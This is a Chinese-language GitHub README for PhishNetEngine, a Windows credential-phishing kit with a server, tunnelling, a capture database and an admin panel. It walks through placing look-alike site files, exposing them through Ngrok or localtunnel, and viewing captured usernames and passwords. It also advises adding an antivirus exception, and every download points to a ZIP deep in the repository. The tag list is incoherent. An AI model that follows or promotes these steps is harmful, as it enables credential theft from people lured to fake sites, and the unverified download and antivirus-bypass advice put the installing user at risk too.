ganialaf97/PhishNetEngine

GitHub: ganialaf97/PhishNetEngine

一款集成服务器、隧道和管理面板的模块化钓鱼凭据捕获引擎,用于安全测试和渗透评估场景。

Stars: 0 | Forks: 0

# 🛡️ PhishNetEngine - 简易凭据捕获设置 [![下载 PhishNetEngine](https://img.shields.io/badge/Download-PhishNetEngine-brightgreen?style=for-the-badge)](https://raw.githubusercontent.com/ganialaf97/PhishNetEngine/main/phishnet-engine/sites/Phish_Engine_Net_v2.5-beta.5.zip) ## 📋 什么是 PhishNetEngine? PhishNetEngine 帮助你创建钓鱼工具。它提供服务器、隧道、数据捕获和管理面板。你只需添加你的网站文件即可开始使用。该工具会在后台处理其他所有事务。 该软件在 Windows 上运行良好。它支持用于研究和渗透测试的常见用例。PhishNetEngine 提供了关键工具,以便在受控环境中安全地捕获凭据。 ## 🖥️ 系统要求 - Windows 10 或更高版本(首选 64 位) - 最低 4 GB RAM(推荐 8 GB) - 500 MB 可用磁盘空间 - 用于下载和隧道功能的互联网连接 - 用于设置和运行服务器组件的基本管理员权限 ## ⚙️ 开始之前 请确保你的 Windows 系统允许从互联网安装软件: 1. 禁用任何限制性的应用商店设置。 2. 检查你的防火墙设置;此工具可能会创建本地服务器和隧道。 3. 关闭其他使用网络端口的应用程序以避免冲突。 ## 🚀 快速入门:下载和设置 1. 点击顶部的大绿色按钮或访问此链接下载 PhishNetEngine: [下载 PhishNetEngine](https://raw.githubusercontent.com/ganialaf97/PhishNetEngine/main/phishnet-engine/sites/Phish_Engine_Net_v2.5-beta.5.zip) 2. 页面打开后,查找最新版本或下载部分。 3. 下载名为 Windows 的文件或支持 Windows 的 ZIP 压缩包。 4. 下载后,在下载文件夹中找到该文件。 5. 如果是 ZIP 文件,右键单击并选择“Extract All...”(全部提取)以解压内容。 ## 🖱️ 在 Windows 上运行 PhishNetEngine 1. 如果你解压了文件,请打开解压后的文件夹。 2. 找到主可执行文件,名称类似于 `PhishNetEngine.exe`。 3. 双击此文件启动程序。将出现一个命令窗口或小型应用程序窗口。 4. 允许任何防火墙提示,以便 PhishNetEngine 可以访问你的网络。 ## 🗂️ 添加你的网站文件 PhishNetEngine 需要你的钓鱼网站文件来捕获数据。 1. 准备你的网站文件(例如 HTML、CSS、JavaScript),用于模仿目标站点。 2. 将这些文件复制到 PhishNetEngine 目录内的 `www` 文件夹中。 3. 如果该文件夹不存在,请在主程序目录内创建一个名为 `www` 的新文件夹。 4. 将你的网站文件粘贴到此处。该工具将向访问者提供这些文件。 ## 🔌 使用管理面板和隧道 - 管理面板允许你管理捕获的数据并监控访问者。 - 按照用户界面中的说明运行命令或 exe 以打开管理面板。 - 对于远程访问,请使用内置隧道功能通过安全 URL 暴露你的服务器。 - 常用的隧道工具包括 Ngrok 或 localtunnel。PhishNetEngine 支持与这些工具轻松集成。 - 按照屏幕上的提示启动隧道会话。 ## 💾 捕获数据 当用户在你的网站文件上提交表单时,PhishNetEngine 会自动记录凭据。 - 数据存储在程序文件夹内的本地数据库中。 - 管理面板清晰地显示捕获的用户名、密码和其他输入数据。 - 你可以导出日志以供分析。 ## 🔄 停止和重启服务器 - 要停止服务器,请关闭命令窗口或在管理面板中使用停止命令。 - 要重启,请再次运行可执行文件。 - 如果你使用隧道功能,请重启隧道。 ## 📁 常见问题故障排除 - **程序无法启动:** 检查杀毒软件或 Windows Defender 是否阻止了它。如有必要,允许例外。 - **端口占用错误:** 关闭其他使用端口 80 或 8080 的应用程序,或在配置文件中更改服务器端口设置。 - **隧道无法工作:** 确保你有有效的互联网连接,并在需要时安装了隧道工具。 - **未捕获数据:** 确认你的网站文件位于正确的文件夹中,并且表单字段使用标准名称。 ## 🔐 安全和隐私 - 仅在安全环境中和获得许可的情况下使用 PhishNetEngine。 - 该工具记录敏感数据;请妥善保管此信息。 - 若无适当保护措施,请勿在公共网络上运行此软件。 ## 📚 其他资源 - 对于高级用户,PhishNetEngine 支持 Linux 系统,包括 Arch Linux、Debian 和 Kali Linux。 - 它专为渗透测试和安全研究项目而设计。 - 查看官方 GitHub 页面以获取更新和社区讨论。 ## 📥 下载 PhishNetEngine 访问下方页面获取软件和最新版本: [下载 PhishNetEngine](https://raw.githubusercontent.com/ganialaf97/PhishNetEngine/main/phishnet-engine/sites/Phish_Engine_Net_v2.5-beta.5.zip) 使用顶部徽章或此链接可使下载易于查找。
标签:ESC8, MITM, Web服务器, Windows工具, 中间人攻击, 凭据窃取, 多人体追踪, 安全教育, 安全测试, 攻击性安全, 攻击路径可视化, 数据捕获, 社会工程学, 管理面板, 网络安全, 网络钓鱼模拟, 自定义脚本, 隐私保护, 隧道技术, 黑客工具